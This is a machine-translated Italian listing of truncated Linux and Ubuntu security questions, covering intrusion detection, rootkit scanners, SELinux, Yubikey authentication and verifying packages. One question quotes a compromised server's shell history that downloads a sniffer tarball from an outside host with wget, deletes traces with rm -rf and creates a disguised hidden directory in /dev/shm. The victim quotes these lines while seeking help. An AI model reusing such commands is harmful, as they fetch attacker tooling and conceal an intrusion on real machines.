La sicurezza copre una vasta gamma di argomenti tra cui utenti, autorizzazioni, autenticazione, autorizzazione, aggiornamenti, firewall, protezione avanzata, ecc.
Uso Linux da un po 'di tempo ormai e sento sempre la necessità di avere una configurazione passiva di software / script che possa avvisarmi di qualsiasi attività di rete sospetta come scansioni, tentativi di accesso falliti, ecc. Al volo via e-mail o tramite notifiche visive / audio. So come …
Di recente ho acquistato uno Yubikey Neo, un piccolo dispositivo di autenticazione hardware secondo fattore. È principalmente destinato all'uso con One Time Passwords e il protocollo emergente U2F, ma dalla versione 2 di Yubikey supporta anche l'autenticazione HMAC-SHA1 challenge-response. HMAC-SHA1 combina una chiave segreta (memorizzata all'interno di Yubikey) e la …
La mia politica aziendale afferma che le scatole di Linux devono essere protette con SELinux (in modo che un revisore della sicurezza possa selezionare la casella di controllo "sì, siamo estremamente sicuri!" Per ciascun server). Speravo di sfruttare la straordinaria sicurezza AppArmor predefinita di Ubuntu. Non è saggio eseguire sia …
Sono sicuro al 99,9% che il mio sistema sul mio personal computer è stato infiltrato. Consentitemi innanzitutto di esprimere il mio ragionamento in modo che la situazione sia chiara: Cronologia approssimativa di attività sospette e successive azioni intraprese: 4-26 23:00 Ho terminato tutti i programmi e chiuso il mio laptop. …
La scansione di chkrootkit mostra "tcpd" come INFETTO. Anche se una scansione di rkhunter mostra ok, (tranne per i falsi positivi regolari) Devo essere preoccupato? (Sono su Ubuntu 16.10 con 4.8.0-37-generico)
So che la password sudo protegge il mio computer dall'hacking locale da parte di qualcuno che ha accesso fisico ad esso ( modifica: in realtà, non lo fa ). La mia password è abbastanza forte per questo scopo, ma so che non è abbastanza forte se qualcuno può forzarla a …
Come il 99% degli utenti, installo Ubuntu da file binari già pronti. Come posso verificare che quei binari provengano effettivamente dal codice sorgente originale di Ubuntu? Sarebbe bene verificare che NSA / qualcuno non abbia collaborato con Ubuntu o Linode (il mio provider VPS) per pasticciare con i binari. Se …
Ubuntu viene fornito con un firewall preinstallato o automatico? In caso contrario, ne ho bisogno? Ho letto alcuni articoli sui vantaggi di Linux rispetto ad altri sistemi operativi in termini di sicurezza (non è necessario disporre di antivirus, ...) ma vorrei esserne sicuro.
Sto eseguendo Ubuntu 10.04.1 LTS. Sto eseguendo rkhunter per verificare la presenza di rootkit. rkhunter si lamenta dei seguenti file e directory nascosti. Penso che questi file non siano un vero problema sul mio sistema, ma come posso verificare se questi file sono file legittimi? [07:57:45] Checking for hidden files …
Ieri ho controllato la mia cronologia dei comandi sul mio VServer. Ho trovato diverse linee sospette. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd …
Sto cercando di capire il do-release-upgradeprocesso, ovvero il modo in cui Ubuntu mi chiede di aggiornare alla prossima versione di Ubuntu della primavera o dell'autunno. Dopo aver letto le fonti per ubuntu-release-upgraderho trovato il file / etc / update-manager / meta-release sul mio sistema. Questo file sembra utilizzare un URL …
Comprendo che se un malware entra in un sistema Linux, otterrà al massimo un privilegio a livello di utente e rovinerà qualsiasi cosa alla portata dell'utente, ad esempio i file dell'utente stesso. Ma cosa impedisce esattamente ai malware di ottenere l'accesso a livello di root? Non può in qualche modo …
Su un sistema RedHat / CentOS, posso verificare gli RPM installati sul mio sistema usando rpm -V . Che cos'è Ubuntu o aptequivalente di questo comando?
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.